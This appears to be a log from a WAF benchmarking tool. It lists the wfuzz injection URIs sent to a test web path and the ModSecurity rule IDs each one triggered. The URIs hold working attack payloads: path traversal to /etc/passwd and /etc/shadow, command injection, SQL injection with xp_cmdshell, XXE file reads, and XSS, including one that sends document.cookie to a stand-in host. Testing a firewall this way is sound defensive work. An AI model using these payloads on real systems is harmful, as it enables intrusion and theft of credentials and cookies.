# ms-inspectorlog v3.5
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/dit/Downloads/inspectorlog/ms-inspectorlog -l Injections.uri -t list -r /home/dit/Downloads/inspectorlog/etc/basic_rules.conf -o /home/dit/TFG/inspectorlog/modsecurity/web_dinamica/security_tools_benchmarking/wfuzz/Injections.clean
Packet [1]	Uri [/web/-1.0/,/web/2147483647/,/web/%00/,/web/\0/,/web/\nnetstat%20-a%\n/]	Nattacks [4 ]	Signatures	[920220]	[920270]	[920271]	[920272]
Packet [2]	Uri [/web/-2/,/web/0/,/web/+%00/,/web/\0\0/,/web/`dir`/,/web/id%00/,/web/;dir/,/web/ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|/]	Nattacks [4 ]	Signatures	[920220]	[920270]	[920271]	[920272]
Packet [3]	Uri [/web//../../../../../../../../%2A/]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [4]	Uri [/web/../../../../../../../../../../../../etc/passwd/]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [5]	Uri [/web/../../boot.ini/]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [6]	Uri [/web/../../../../../../../../../../../../etc/passwd%00/,/web/../../../../../../../../../../../../etc/hosts/]	Nattacks [7 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]
Packet [7]	Uri [/web/-20/,/web/-268435455/,/web/\00\00/,/web/\"blah/,/web/\n/bin/ls%20-al\n/,/web/../../../../../../../../../../../../etc/hosts%00/,/web/../../../../../../../../../../../../etc/shadow%00/,/web//../../../../../../../../../../etc/passwd^^/]	Nattacks [7 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]
Packet [8]	Uri [/web/1/,/web/0xfffffff/,/web/$null/,/web/;ls%20-la/,/web/|/bin/ls%20-al/,/web//../../../../../../../../../../etc/shadow/]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [9]	Uri [/web/-1/,/web/null/,/web/\0\0\0/,/web/|dir/,/web/?x="/,/web//../../../../../../../../../../etc/passwd/]	Nattacks [9 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942110]	[942460]
Packet [10]	Uri [/web/../../../../../../../../../../../../etc/shadow/]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [11]	Uri [/web//../../../../../../../../../../etc/shadow^^/]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [12]	Uri [/web/A/,/web/00/,/web/NULL/,/web/$NULL/,/web/&quot;;id&quot;/,/web/|dir|/,/web//boot.ini/,/web//..\../..\../..\../..\../..\../..\../etc/shadow/,/web//../../../../../../../../bin/id|/]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [13]	Uri [/web/..\..\..\..\..\..\..\..\..\..\etc\shadow/,/web/../../../../../../../../conf/server.xml/]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [14]	Uri [/web/;netstat%20-a;/,/web/?x=>/,/web/\..\..\..\..\..\..\..\..\..\..\etc\shadow/,/web//..\../..\../..\../..\../..\../..\../etc/passwd/,/web/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00/,/web//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow/]	Nattacks [16 ]	Signatures	[920220]	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942430]	[942431]	[942460]
Packet [15]	Uri [/web//%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00/,/web//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd/]	Nattacks [8 ]	Signatures	[920220]	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]
Packet [16]	Uri [/web//./././././././././././etc/passwd/,/web//../../../../../../../../../../../etc/passwd%00.jpg/,/web//..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd/,/web/../../../../../../../../../../../../localstart.asp/]	Nattacks [8 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]
Packet [17]	Uri [/web/FALSE/,/web/TRUE/,/web/\00/,/web/`id`/,/web/|ls/,/web//index.html|id|/,/web/..\..\..\..\..\..\..\..\..\..\etc\passwd/,/web/..\..\..\..\..\..\..\..\..\..\etc\shadow%00/,/web/\..\..\..\..\..\..\..\..\..\..\etc\passwd%00/,/web/..\..\..\..\..\..\..\..\..\..\etc\passwd%00/,/web/.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow/,/web/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%255cboot.ini/,/web//../../../../../../../../../../../boot.ini/]	Nattacks [9 ]	Signatures	[920220]	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]
Packet [18]	Uri [/web/../../../../../../../../../../../../boot.ini/]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [19]	Uri [/web/C:\inetpub\wwwroot\global.asa/,/web/C:\boot.ini/,/web/%/]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [20]	Uri [/web//,%ENV,//]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [21]	Uri [/web//../../../../../../../../../../../boot.ini%00/,/web//../../../../../../../../../../../boot.ini%00.jpg/,/web//../../../../../../../../../../../boot.ini%00.html/,/web//.../.../.../.../...//,/web//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini/]	Nattacks [7 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]
Packet [22]	Uri [/web/../../../../../../../../../../../../localstart.asp%00/,/web/../../../../../../../../../../../../boot.ini%00/,/web/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini/,/web/;/,/web/`/,/web/\'/,/web/,/web/{'}/,/web/%2e%2e%2f/,/web/..%%35c/]	Nattacks [8 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]
Packet [23]	Uri [/web//./././././././././././etc/shadow/,/web/\\&apos;/bin/cat%20/etc/passwd\\&apos;/,/web//./././././././././././boot.ini/,/web///,/web/&lt;/,/web/*|/,/web/<?/,/web/!'/,/web/..%bg%qf/]	Nattacks [3 ]	Signatures	[920220]	[920272]	[930100]
Packet [24]	Uri [/web/2/,/web/268435455/,/web/%0a/,/web/;id;/,/web/|id/,/web/?x=/,/web/%0a/bin/cat%20/etc/passwd/,/web//%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini/,/web//..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow/,/web/%0d%0aX-Injection-Header:%20AttackValue/,/web/\/,/web/||/,/web/^'/,/web/&,/web/,/web/..//,/web/..%u2215/]	Nattacks [20 ]	Signatures	[921190]	[920220]	[920271]	[920272]	[921151]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932100]	[932160]	[942120]	[942370]	[942430]	[942431]	[942460]
Packet [25]	Uri [/web/!@,/web/\\\\?\\/,/web/&LT/,/web/(')/,/web/&,/web/..%5c/,/web/..%%35%63/]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[930110]
Packet [26]	Uri [/web/..%u2216/]	Nattacks [4 ]	Signatures	[920220]	[920271]	[920272]	[930100]
Packet [27]	Uri [/web/%2500/,/web/%5C//,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/\u003C/,/web/&ltscript&gtalert(document.cookie);</script>/,/web/,/web/<IMG%20SRC="jav&,/web/<IMG%20SRC=&,/web/'%20--/,/web/admin'--/,/web/<>"'%;)(&+/]	Nattacks [4 ]	Signatures	[920220]	[920270]	[920271]	[920272]
Packet [28]	Uri [/web/&lt;!--,/web/\\/,/web/<</,/web/[']/,/web/&,/web//%2A/,/web/%00/,/web/%2A/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/<IMG%20SRC="javascript:alert('XSS')"/,/web/'><script>alert(document.cookie);</script>/,/web/@&apos;/,/web/<IMG%20SRC="jav&,/web/%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E/,/web/"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>/,/web/,/web/\x27\x6F\x72%20SELECT%20*/,/web/'%20or%20a=a--/,/web/'%20or%200=0%20,/web/order%20by/,/web/'hi'%20or%20'x'='x';/,/web/'%20or%20user%20like%20'%/]	Nattacks [19 ]	Signatures	[920220]	[920270]	[920271]	[920272]	[941110]	[941160]	[941180]	[942110]	[942130]	[942180]	[942260]	[942330]	[942380]	[942390]	[942430]	[942440]	[942431]	[942460]	[942511]
Packet [29]	Uri [/web/..\/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/<xss><script>alert('XSS')</script></vulnerable>/,/web/">xxx<P>yyy/,/web/&apos;/,/web/<IMG%20"""><SCRIPT>alert("XSS")</SCRIPT>">/,/web//,/web/'%20;/,/web/=%20'/,/web/or%201=1--/,/web/')%20or%20('x'='x/,/web/procedure/,/web/replace/,/web/'%20or%20uid%20like%20'%/]	Nattacks [6 ]	Signatures	[920220]	[920272]	[930100]	[930110]	[930110]	[941110]
Packet [30]	Uri [/web/65536/,/web/\0/,/web/\00\00\00/,/web/|ls%20-la/,/web/?x=|/,/web/\..\..\..\..\..\..\..\..\..\..\etc\passwd/,/web/.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd/,/web//.\\./.\\./.\\./.\\./.\\./.\\./boot.ini/,/web/%01%02%03%04%0a%0d%0aADSF/,/web/&lt/,/web/</,/web/!@,/web/&,/web/%5C/,/web/%2C/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/"><script>"/,/web/\";alert('XSS');///,/web/{&apos;}/,/web/<IMG%20SRC='javascript:alert(document.cookie)'>/,/web/'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E/,/web/--/,/web/\x23/,/web/or%201=1/,/web/"%20or%200=0%20--/,/web/")%20or%20("a"="a/,/web/PRINT/,/web/')%20or%20('a'='a/,/web/'%20or%20userid%20like%20'%/]	Nattacks [20 ]	Signatures	[920220]	[920230]	[920271]	[920272]	[921151]	[921180]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[941100]	[941110]	[941140]	[941160]	[941170]	[941180]	[941210]
Packet [31]	Uri [/web/'%20or%20uname%20like%20'%/]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [32]	Uri [/web/'%20or%20username%20like%20'%/]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [33]	Uri [/web//../../../../../../../../../../../etc/passwd%00.html/,/web/..\..\..\..\..\..\..\..\..\..\boot.ini%00/,/web/\..\..\..\..\..\..\..\..\..\..\boot.ini/,/web/*/,/web/|/,/web/@'/,/web/%00/,/web/%00//,/web//%00//,/web/,/web/%01%02%03%04%0a%0d%0aADSF/,/web/*'/,/web/%20|/,/web/..%25%35%63/,/web/&,/web/&,/web/&,/web/&,/web/\x3c/,/web/\x3C/,/web/%3cscript%3ealert(document.cookie);%3c%2fscript%3e/,/web/%3cscript%3ealert("XSS");%3c/script%3e/,/web/*&apos;/,/web/<IMG%20SRC=`javascript:alert("'XSS'")`>/,/web/<IMG%20LOWSRC="javascript:alert('XSS')">/,/web/-/,/web/\x3D%20\x3B'/,/web/'%20or%200=0%20--/,/web/'%20or%201=1--/,/web/limit/,/web/hi")%20or%20("a"="a/,/web/\x27UNION%20SELECT/,/web/like/,/web/&lt;&gt;&quot;'%;)(&amp;+/]	Nattacks [11 ]	Signatures	[921190]	[920220]	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[941110]
Packet [34]	Uri [/web/'%20or%20'x'='x/,/web/or%200=0%20,/web/hi'%20or%20'a'='a/,/web/@variable/,/web/desc/,/web/handler/,/web/tz_offset/,/web/(sqlattempt2)/,/web/count(/child::node())/,/web/%26/,/web/<xml%20SRC="xsstest.xml"%20ID=I></xml><SPAN%20DATASRC=]	Nattacks [1 ]	Signatures	[933161]
Packet [35]	Uri [/web/bfilename/,/web/'%20or%201=1/,/web/|/,/web/x'%20or%20name()='username'%20or%20'x'='y/,/web/'%20or%201=1%20or%20''='/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><!DOCTYPE%20foo%20[<!ELEMENT%20foo%20ANY><!ENTITY%20xxe%20SYSTEM%20"file:////etc/passwd">]><foo>&xxe;</foo>/]	Nattacks [10 ]	Signatures	[930120]	[932160]	[933190]	[941100]	[941130]	[942110]	[942430]	[942490]	[942431]	[942460]
Packet [36]	Uri [/web/1.0/,/web/<%20%20script%20>%20<%20/%20script>/,/web/\00/,/web/;read;/,/web/id%00|/,/web/|id|/,/web//etc/passwd/,/web/\..\..\..\..\..\..\..\..\..\..\etc\shadow%00/,/web/%00../../../../../../etc/passwd/,/web/%00../../../../../../etc/shadow/,/web/%00/etc/shadow%00/,/web/%00/etc/passwd%00/,/web/%0a/bin/cat%20/etc/shadow/,/web/\\&apos;/bin/cat%20/etc/shadow\\&apos;/,/web//..\../..\../..\../..\../..\../..\../boot.ini/,/web/}/,/web/&LT;/,/web//'/,/web/,/web/"\t"/,/web/%250a/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/\&apos;/,/web/%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E/,/web/[&apos;]/,/web/<IMG%20SRC="javascript:alert('XSS');">/,/web/<IMG%20SRC=&,/web/--';/,/web/'or%20select%20*/,/web/'%20or%20'1'='1'--/,/web/"'%20or%201%20--'"/,/web/select/,/web/PRINT%20@@variable/,/web/hi"%20or%20"a"="a/,/web/t'exec%20master..xp_cmdshell%20'nslookup%20www.google.com'--/,/web/'%20UNION%20ALL%20SELECT/,/web/'||UTL_HTTP.REQUEST/,/web/&apos;%20OR/,/web////,/web/(/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><!DOCTYPE%20foo%20[<!ELEMENT%20foo%20ANY><!ENTITY%20xxe%20SYSTEM%20"file://c:/boot.ini">]><foo>&xxe;</foo>/]	Nattacks [18 ]	Signatures	[921190]	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[933190]	[941100]	[941130]	[942110]	[942430]	[942490]	[942431]	[942460]
Packet [37]	Uri [/web//etc/shadow/,/web/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00/,/web/C:/boot.ini/,/web/..\..\..\..\..\..\..\..\..\..\boot.ini/,/web/,/web/\\\\*/,/web/-/,/web/%3C/,/web/\t/,/web/..%255c/,/web/%7C/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/<IMG%20SRC="javascript:alert('XSS');">/,/web/<<script>alert("XSS");//<</script>/,/web/^&apos;/,/web/<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>/,/web/<IMG%20DYNSRC="javascript:alert('XSS')">/,/web/'';!--"<XSS>=&{()}/,/web/\x27\x4F\x52%20SELECT%20*/,/web/"%20or%201=1%20or%20""="/,/web/"%20or%200=0%20,/web/asc/,/web/,@variable/,/web/update/,/web/';%20exec%20xp_regread/,/web/delete/,/web/%20$(sleep%2050)/,/web/*(|(mail=*))/,/web/%21/,/web/<name>',''));%20phpinfo();%20exit;/*</name>/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>/]	Nattacks [20 ]	Signatures	[920220]	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[933160]	[933190]	[941110]	[941160]	[941180]	[942110]	[942370]	[942430]	[942490]	[942431]	[942460]
Packet [38]	Uri [/web/C:/inetpub/wwwroot/global.asa/,/web/&lt;!--,/web/\\//,/web/<<</,/web/--/,/web/,/web/%3C%3F/,/web/%20/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/<IMG%20SRC=javascript:alert('XSS')>/,/web/'><script>alert(document.cookie)</script>/,/web//&apos;/,/web/<IMG%20SRC="jav&,/web/<IMG%20SRC=&,/web/"/,/web/\x27/,/web/'%20or%201=1%20or%20''='/,/web/or%200=0%20--/,/web/'%20or%20''='/,/web/or/,/web/hi'%20or%201=1%20--/,/web/--sp_password/,/web/having/,/web/'%20or%20(EXISTS)/,/web/%20'sleep%2050'/,/web///*/,/web/%29/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><!DOCTYPE%20foo%20[<!ELEMENT%20foo%20ANY><!ENTITY%20xxe%20SYSTEM%20"file:////dev/random">]><foo>&xxe;</foo>/]	Nattacks [8 ]	Signatures	[933190]	[941100]	[941130]	[942110]	[942430]	[942490]	[942431]	[942460]
Packet [39]	Uri [/web/..%c0%af/,/web/%60/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/<IMG%20SRC='javascript:alert(document.cookie)'>/,/web/<script>alert(document.cookie)</script>/,/web/something%00html/,/web/<IMG%20SRC=JaVaScRiPt:alert('XSS')>/,/web/<IMG%20SRC="%20&,/web/';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}/,/web/'/,/web/\x3D%20\x27/,/web/or%201=1%20--/,/web/0%20or%201=1/,/web/"%20or%20"a"="a/,/web/as/,/web/hi"%20or%201=1%20--/,/web/exec%20sp/,/web/distinct/,/web/char%4039%41%2b%40SELECT/,/web/)/,/web///,/web/%2A%28%7C%28mail%3D%2A%29%29/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><!DOCTYPE%20foo%20[<!ELEMENT%20foo%20ANY><!ENTITY%20xxe%20SYSTEM%20"file:////etc/shadow">]><foo>&xxe;</foo>/]	Nattacks [17 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930120]	[932160]	[933190]	[941100]	[941110]	[941130]	[942110]	[942430]	[942490]	[942431]	[942460]
Packet [40]	Uri [/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&ltscript&gtalert(document.cookie);&ltscript&gtalert/,/web/<script>alert("XSS")</script>/,/web/\u003c/,/web/<IMG%20SRC=javascript:alert(&quot;XSS&quot;)>/,/web/<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>/,/web/=%20;/,/web/=%20--/,/web/"%20or%201=1--/,/web/"%20or%20"x"="x/,/web/insert/,/web/hi')%20or%20('a'='a/,/web/';%20exec%20master..xp_cmdshell/,/web/'%20(select%20top%201/,/web/*|/,/web/x'%20or%201=1%20or%20'x'='y/,/web/'%20or%20''='/,/web/<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>/,/web/<![CDATA[<script>var%20n=0;while(true){n++;}</script>]]>/]	Nattacks [1 ]	Signatures	[941110]
Packet [42]	Uri [/web/exec%20xp/,/web/%27%20or%201=1/,/web/%2A%7C/,/web/*(|(objectclass=*))/,/web/!/,/web/%2A%28%7C%28objectclass%3D%2A%29%29/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><foo><![CDATA['%20or%201=1%20or%20''=']]></foo>/]	Nattacks [13 ]	Signatures	[933190]	[941180]	[942110]	[942130]	[942180]	[942330]	[942370]	[942390]	[942430]	[942490]	[942431]	[942460]	[942511]
Packet [43]	Uri [/web/1;SELECT%20*/,/web/%7C/,/web/*/*/,/web/&/,/web/<xml%20ID="xss"><I><B>&lt;IMG%20SRC="javas<!--%20-->cript:alert('XSS')"&gt;</B></I></xml><SPAN%20DATASRC=",/web/<HTML%20xmlns:xss><?import%20namespace="xss"%20implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>/]	Nattacks [4 ]	Signatures	[942110]	[942260]	[942430]	[942431]
# N. packets [43], [42] with alerts, N. Alerts [300]
